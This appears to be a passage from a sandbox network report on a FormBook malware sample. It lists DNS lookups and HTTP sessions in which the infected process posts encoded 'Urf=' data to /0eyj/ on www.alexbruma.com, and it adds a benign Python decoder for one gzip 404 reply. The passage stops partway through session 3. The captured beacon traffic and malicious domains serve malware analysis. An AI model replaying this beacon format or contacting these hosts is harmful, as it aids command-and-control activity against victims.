May 23, 2024 20:29:07.019175053 CEST | 49710 | 80 | 192.168.2.5 | 103.48.135.8
May 23, 2024 20:29:07.020560026 CEST | 49710 | 80 | 192.168.2.5 | 103.48.135.8
May 23, 2024 20:29:07.069839954 CEST | 80 | 49710 | 103.48.135.8 | 192.168.2.5
May 23, 2024 20:29:30.182806969 CEST | 49711 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:30.187788963 CEST | 80 | 49711 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:30.188148022 CEST | 49711 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:30.189594030 CEST | 49711 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:30.243305922 CEST | 80 | 49711 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:30.921179056 CEST | 80 | 49711 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:30.925868034 CEST | 80 | 49711 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:30.928771019 CEST | 49711 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:31.692837000 CEST | 49711 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:32.711237907 CEST | 49712 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:32.716259003 CEST | 80 | 49712 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:32.716376066 CEST | 49712 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:32.718127012 CEST | 49712 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:32.769849062 CEST | 80 | 49712 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:33.471339941 CEST | 80 | 49712 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:33.476043940 CEST | 80 | 49712 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:33.476136923 CEST | 49712 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:34.225544930 CEST | 49712 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:35.255434036 CEST | 49713 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:35.260838985 CEST | 80 | 49713 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:35.260972023 CEST | 49713 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:35.263061047 CEST | 49713 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:35.269814968 CEST | 80 | 49713 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:35.315675020 CEST | 80 | 49713 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:36.015850067 CEST | 80 | 49713 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:36.020658970 CEST | 80 | 49713 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:36.021152020 CEST | 49713 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:36.770883083 CEST | 49713 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:37.789593935 CEST | 49714 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:37.794645071 CEST | 80 | 49714 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:37.794795036 CEST | 49714 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:37.797410965 CEST | 49714 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:37.849877119 CEST | 80 | 49714 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:38.578330994 CEST | 80 | 49714 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:38.588238001 CEST | 80 | 49714 | 172.67.214.17 | 192.168.2.5
May 23, 2024 20:29:38.588372946 CEST | 49714 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:38.589107037 CEST | 49714 | 80 | 192.168.2.5 | 172.67.214.17
May 23, 2024 20:29:38.641992092 CEST | 80 | 49714 | 172.67.214.17 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 20:28:58.546681881 CEST | 50073 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:28:59.536812067 CEST | 50073 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:29:00.536761045 CEST | 50073 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:29:00.632924080 CEST | 53 | 50073 | 1.1.1.1 | 192.168.2.5
May 23, 2024 20:29:00.679876089 CEST | 53 | 50073 | 1.1.1.1 | 192.168.2.5
May 23, 2024 20:29:00.679887056 CEST | 53 | 50073 | 1.1.1.1 | 192.168.2.5
May 23, 2024 20:29:05.680784941 CEST | 54910 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:29:06.132915974 CEST | 53 | 54910 | 1.1.1.1 | 192.168.2.5
May 23, 2024 20:29:22.057769060 CEST | 52812 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:29:22.070039988 CEST | 53 | 52812 | 1.1.1.1 | 192.168.2.5
May 23, 2024 20:29:30.133668900 CEST | 49568 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:29:30.180363894 CEST | 53 | 49568 | 1.1.1.1 | 192.168.2.5
May 23, 2024 20:29:43.709440947 CEST | 50280 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:29:43.797393084 CEST | 53 | 50280 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 20:28:58.546681881 CEST | 192.168.2.5 | 1.1.1.1 | 0xfc98 | Standard query (0) | www.bookingshop01.top | A (IP address) | IN (0x0001) | false
May 23, 2024 20:28:59.536812067 CEST | 192.168.2.5 | 1.1.1.1 | 0xfc98 | Standard query (0) | www.bookingshop01.top | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:00.536761045 CEST | 192.168.2.5 | 1.1.1.1 | 0xfc98 | Standard query (0) | www.bookingshop01.top | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:05.680784941 CEST | 192.168.2.5 | 1.1.1.1 | 0xf47d | Standard query (0) | www.uzonedich.com | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:22.057769060 CEST | 192.168.2.5 | 1.1.1.1 | 0xf2c1 | Standard query (0) | www.7egiy1.cfd | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:30.133668900 CEST | 192.168.2.5 | 1.1.1.1 | 0xad31 | Standard query (0) | www.alexbruma.com | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:43.709440947 CEST | 192.168.2.5 | 1.1.1.1 | 0xc361 | Standard query (0) | www.prospin.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 20:29:00.632924080 CEST | 1.1.1.1 | 192.168.2.5 | 0xfc98 | Server failure (2) | www.bookingshop01.top | none | none | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:00.679876089 CEST | 1.1.1.1 | 192.168.2.5 | 0xfc98 | Server failure (2) | www.bookingshop01.top | none | none | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:00.679887056 CEST | 1.1.1.1 | 192.168.2.5 | 0xfc98 | Server failure (2) | www.bookingshop01.top | none | none | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:06.132915974 CEST | 1.1.1.1 | 192.168.2.5 | 0xf47d | No error (0) | www.uzonedich.com | | 103.48.135.8 | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:22.070039988 CEST | 1.1.1.1 | 192.168.2.5 | 0xf2c1 | Name error (3) | www.7egiy1.cfd | none | none | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:30.180363894 CEST | 1.1.1.1 | 192.168.2.5 | 0xad31 | No error (0) | www.alexbruma.com | | 172.67.214.17 | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:30.180363894 CEST | 1.1.1.1 | 192.168.2.5 | 0xad31 | No error (0) | www.alexbruma.com | | 104.21.77.252 | A (IP address) | IN (0x0001) | false
May 23, 2024 20:29:43.797393084 CEST | 1.1.1.1 | 192.168.2.5 | 0xc361 | Name error (3) | www.prospin.click | none | none | A (IP address) | IN (0x0001) | false
                      • www.uzonedich.com
                      • www.alexbruma.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49710 | 103.48.135.8 | 80 | 1352 | C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
Timestamp | Bytes transferred | Direction | Data
May 23, 2024 20:29:06.154524088 CEST | 511 | OUT | GET /ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI HTTP/1.1
                      Host: www.uzonedich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
May 23, 2024 20:29:07.014317036 CEST | 691 | IN | HTTP/1.1 403 Forbidden
                      Server: nginx
                      Date: Thu, 23 May 2024 18:29:06 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49711 | 172.67.214.17 | 80 | 1352 | C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
Timestamp | Bytes transferred | Direction | Data
May 23, 2024 20:29:30.189594030 CEST | 771 | OUT | POST /0eyj/ HTTP/1.1
                      Host: www.alexbruma.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Accept-Encoding: gzip, deflate, br
                      Origin: http://www.alexbruma.com
                      Referer: http://www.alexbruma.com/0eyj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 204
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                      Data Raw: 55 72 66 3d 38 5a 6b 6c 74 72 53 34 42 45 45 4d 34 4c 59 49 55 62 6c 2b 4f 75 68 73 49 46 72 5a 6e 71 36 4b 41 32 48 55 36 72 35 44 2f 69 49 53 46 6d 58 69 49 31 77 36 4d 50 6a 6f 4d 4f 6e 68 7a 6b 75 61 67 61 30 37 72 71 65 52 55 6e 43 49 5a 58 2b 4c 30 2f 2b 77 78 31 63 45 69 31 4d 66 5a 72 52 55 34 77 70 51 71 64 52 63 58 71 6d 54 51 64 4b 62 43 6d 73 4f 50 48 6b 6c 66 63 33 6c 64 78 75 4f 6f 31 58 62 55 74 52 4a 42 65 76 31 2b 53 55 6b 4e 72 53 66 78 45 52 63 70 30 58 75 38 77 63 4f 55 42 46 4e 41 36 30 63 51 52 4f 53 4f 76 33 7a 31 37 56 4c 6a 63 75 4a 68 4f 6f 4e 52 59 4b 70 63 43 72 57 41 52 34 3d
                      Data Ascii: Urf=8ZkltrS4BEEM4LYIUbl+OuhsIFrZnq6KA2HU6r5D/iISFmXiI1w6MPjoMOnhzkuaga07rqeRUnCIZX+L0/+wx1cEi1MfZrRU4wpQqdRcXqmTQdKbCmsOPHklfc3ldxuOo1XbUtRJBev1+SUkNrSfxERcp0Xu8wcOUBFNA60cQROSOv3z17VLjcuJhOoNRYKpcCrWAR4=
May 23, 2024 20:29:30.921179056 CEST | 816 | IN | HTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:29:30 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Transfer-Encoding: chunked
                      Connection: close
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTDzKzRHGF6T7c3wPmmJUP2aLUqZYFsOZH7jrvhqEFg4rJXjwQjj0XGOOna9U8sTe6Jfo2gh2biqAlIveAApqbQ8W65HFqOR1o9%2BqFbFwKlsqfbziKo4ndIRZW%2BAJVQIb8%2B3hA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88871ca27ba97cac-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90

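The "Data Raw" hex in the session tables is the only faithful copy of what the server returned; the "Data Ascii" rendering of a gzip body is unreadable. The following example, added here and not part of the Joe Sandbox report, reconstructs the body of the session 1 response: it parses the status line and headers, strips the chunked framing and inflates the gzip stream. The hex is copied from the session 1 "Data Raw" row; the status line and headers in RESPONSE_HEAD are the ones the report lists for that response, minus the Cloudflare and NEL headers, which do not affect decoding. All function names are this example's own.

```python
import gzip
import zlib

# Added example, not part of the Joe Sandbox report. Reconstructs the body of
# the HTTP session 1 response from the report's "Data Raw" hex, copied below
# verbatim. RESPONSE_HEAD is the status line plus the headers that matter for
# decoding, taken from the headers the report lists for that response.
SESSION1_BODY_HEX = (
    "61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 "
    "10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 "
    "73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 "
    "bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb "
    "78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 "
    "2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 "
    "b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd "
    "01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 "
    "f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 "
    "0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a"
)
RESPONSE_HEAD = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Encoding: gzip\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)
SESSION1_RESPONSE = RESPONSE_HEAD + bytes.fromhex(SESSION1_BODY_HEX)


def parse_http_response(raw):
    """Split a raw HTTP/1.1 response into (status line, headers dict, body).
    Header names are lower-cased; this capture has no duplicate headers."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def dechunk(body):
    """Remove chunked framing: <hex size>CRLF <data>CRLF ... 0CRLF CRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        if size == 0:
            return bytes(out)
        pos = eol + 2
        out += body[pos:pos + size]
        pos += size + 2  # step over the data and its trailing CRLF


def gzip_isize(stream):
    """ISIZE from the gzip trailer (uncompressed length mod 2**32): a cheap
    cross-check of the expected size before inflating anything."""
    return int.from_bytes(stream[-4:], "little")


def decode_body(headers, body):
    """Undo transfer encoding, then content encoding, as a client would."""
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body = dechunk(body)
    encoding = headers.get("content-encoding", "").lower()
    if encoding == "gzip":
        body = gzip.decompress(body)
    elif encoding == "deflate":
        body = zlib.decompress(body)
    return body


def decode_session1():
    """Return (status line, decoded body bytes) for the session 1 response."""
    status, headers, body = parse_http_response(SESSION1_RESPONSE)
    return status, decode_body(headers, body)


if __name__ == "__main__":
    status, page = decode_session1()
    print(status, len(page), "bytes")
    print(page.decode("iso-8859-1"))
```

The decoded body is 203 bytes, the stock Apache "404 Not Found" page for /0eyj/, byte-for-byte the same document that session 4 below receives uncompressed (its chunk size there is also 0xcb). The gzip trailer's ISIZE field, cb 00 00 00, already announces the 203 bytes, which is worth checking before inflating untrusted data. A generic 404 from a Cloudflare-fronted host says nothing about whether www.alexbruma.com is the live panel or one of the decoy domains a FormBook configuration cycles through; the DNS table above, where only two of five queried names resolve at all, is consistent with that decoy-list behaviour.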

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49712 | 172.67.214.17 | 80 | 1352 | C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
Timestamp | Bytes transferred | Direction | Data
May 23, 2024 20:29:32.718127012 CEST | 791 | OUT | POST /0eyj/ HTTP/1.1
                      Host: www.alexbruma.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Accept-Encoding: gzip, deflate, br
                      Origin: http://www.alexbruma.com
                      Referer: http://www.alexbruma.com/0eyj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 224
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                      Data Raw: 55 72 66 3d 38 5a 6b 6c 74 72 53 34 42 45 45 4d 69 71 6f 49 58 34 4e 2b 4c 4f 68 76 44 6c 72 5a 75 4b 36 4f 41 32 4c 55 36 70 56 54 2b 57 6b 53 46 47 6e 69 50 30 77 36 50 50 6a 6f 5a 2b 6d 72 75 30 75 52 67 61 78 47 72 6f 4b 52 55 6a 71 49 5a 57 4f 4c 31 4f 2b 2f 2b 46 63 47 76 56 4d 5a 54 4c 52 55 34 77 70 51 71 64 56 36 58 71 2b 54 51 74 61 62 46 33 73 50 44 6e 6b 69 50 4d 33 6c 5a 78 75 53 6f 31 58 35 55 70 52 6e 42 63 48 31 2b 54 6b 6b 4e 2b 79 63 2b 45 52 47 6d 55 57 62 2f 43 39 68 57 78 78 42 64 71 68 4e 50 77 57 51 43 35 61 5a 76 5a 64 6a 77 38 43 78 78 64 67 36 41 6f 72 41 47 68 37 6d 65 47 74 4d 4b 44 6b 64 4b 4e 4f 36 52 74 63 45 32 54 46 47 4d 53 6c 31
                      Data Ascii: Urf=8ZkltrS4BEEMiqoIX4N+LOhvDlrZuK6OA2LU6pVT+WkSFGniP0w6PPjoZ+mru0uRgaxGroKRUjqIZWOL1O+/+FcGvVMZTLRU4wpQqdV6Xq+TQtabF3sPDnkiPM3lZxuSo1X5UpRnBcH1+TkkN+yc+ERGmUWb/C9hWxxBdqhNPwWQC5aZvZdjw8Cxxdg6AorAGh7meGtMKDkdKNO6RtcE2TFGMSl1
May 23, 2024 20:29:33.471339941 CEST | 813 | IN | HTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:29:33 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Transfer-Encoding: chunked
                      Connection: close
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyCJTmDV9ptbaS1LmXnX3s2wST%2FMbCNKmJzEUCj3PwPKcLPZaBEUBJQ7wSP9BeU1CH%2Bvb%2BvjgLgkMolS3mre3FWg86VlHduzeGggAamCEeRTfjFc1Uuq5uE8gviAp2%2BYQDLwXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88871cb238350c8a-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 62 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: b8L=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~90


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49713 | 172.67.214.17 | 80 | 1352 | C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
Timestamp | Bytes transferred | Direction | Data
May 23, 2024 20:29:35.263061047 CEST | 1808 | OUT | POST /0eyj/ HTTP/1.1
                      Host: www.alexbruma.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Accept-Encoding: gzip, deflate, br
                      Origin: http://www.alexbruma.com
                      Referer: http://www.alexbruma.com/0eyj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1240
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                      Data Raw: 55 72 66 3d 38 5a 6b 6c 74 72 53 34 42 45 45 4d 69 71 6f 49 58 34 4e 2b 4c 4f 68 76 44 6c 72 5a 75 4b 36 4f 41 32 4c 55 36 70 56 54 2b 58 77 53 45 31 66 69 50 58 59 36 4f 50 6a 6f 59 2b 6d 71 75 30 75 41 67 65 64 43 72 6f 47 72 55 6c 75 49 57 55 71 4c 38 61 71 2f 70 56 63 47 7a 6c 4d 59 5a 72 51 51 34 77 5a 55 71 65 39 36 58 71 2b 54 51 76 53 62 54 32 73 50 46 6e 6b 6c 66 63 33 35 64 78 75 75 6f 31 50 44 55 70 64 5a 42 4e 6e 31 2f 7a 30 6b 42 71 53 63 33 45 52 59 79 30 57 44 2f 43 78 2b 57 78 64 6e 64 70 38 61 50 78 69 51 42 39 6e 53 34 35 70 38 6b 64 36 75 2f 50 73 73 65 63 48 6c 4f 79 50 69 54 58 45 6a 4a 69 67 75 50 37 4f 59 46 50 52 44 79 58 39 49 4c 47 34 50 61 72 4d 53 58 59 6a 42 37 65 34 61 4e 62 71 59 77 6d 41 6a 35 38 71 64 4c 7a 76 72 2f 76 6d 39 61 59 49 65 72 69 34 4b 6e 68 6a 6e 6b 2b 2b 39 46 31 54 4b 62 42 34 42 72 59 53 61 51 64 56 32 59 66 73 36 42 50 4d 4c 2f 59 49 43 7a 30 34 53 61 33 79 53 4b 4f 68 44 2f 43 44 6a 37 62 6e 36 2f 36 50 6e 73 63 43 42 71 46 74 66 44 62 41 66 30 71 [TRUNCATED]
                      Data Ascii: Urf=8ZkltrS4BEEMiqoIX4N+LOhvDlrZuK6OA2LU6pVT+XwSE1fiPXY6OPjoY+mqu0uAgedCroGrUluIWUqL8aq/pVcGzlMYZrQQ4wZUqe96Xq+TQvSbT2sPFnklfc35dxuuo1PDUpdZBNn1/z0kBqSc3ERYy0WD/Cx+Wxdndp8aPxiQB9nS45p8kd6u/PssecHlOyPiTXEjJiguP7OYFPRDyX9ILG4ParMSXYjB7e4aNbqYwmAj58qdLzvr/vm9aYIeri4Knhjnk++9F1TKbB4BrYSaQdV2Yfs6BPML/YICz04Sa3ySKOhD/CDj7bn6/6PnscCBqFtfDbAf0qJVyLf0zw7GmR3HoeSxr/yaWT+s7RQ8R22Z1EnMq1QVIA3rsIKouJkmS22m8hQ9wrV0xxk7m57OVU4Ns0Nq01z4AGAxDabLVd4NpYas8I3BTBG0AxiloxrwD7FP19trYcbR3XuOsBT0xRR6t/lG2nki3az7MNsW+6Su8jeVs6HqqqO3T2WCijkDMarhSc0yeo5/wH6mMas0citH8Nn5/Y6am6/Jx+4S6FXn4+Lsor3cs52sIjOFPmrtBiHQoanWoGbVs7TkPs2uhOlnFE83bfHfCDORs7dbdBHkubhZQSxTtXZy5h+wwPJBaIFoW1G7sZKxMVnZ8OYzlRvoe7WU0R77VJsL3Dkp3LUhh1jkJjITV9dX7P94UpdLDuSoTZM9yZrmIFMOlaDqzS3WdR4YzQCocPeY2Wb8XCHvH5rIGmUMqyMxPoJ+eTiI7gtv3sPfsxP4J49zKYMApi45lYeu7zarOy5c1lAE9e0S/Qag4iQBqVDwdvqoFC18K2QplzjcRGhQjZKrztqzSXF4VbfIv/d7GdlqXjS3ZDCNLUs6pFQu/1AzCRpCxKJVRs7W9OxWY87JKJtQxFvN0ALjtFuZlXxtzoYv99aZ84Utph8Xumsk030p8EznkHEsZIsIJiAqmNKIEscCFN00LE0rrgCHVVunrz+WpFbePRNm [TRUNCATED]
May 23, 2024 20:29:36.015850067 CEST | 824 | IN | HTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:29:35 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Transfer-Encoding: chunked
                      Connection: close
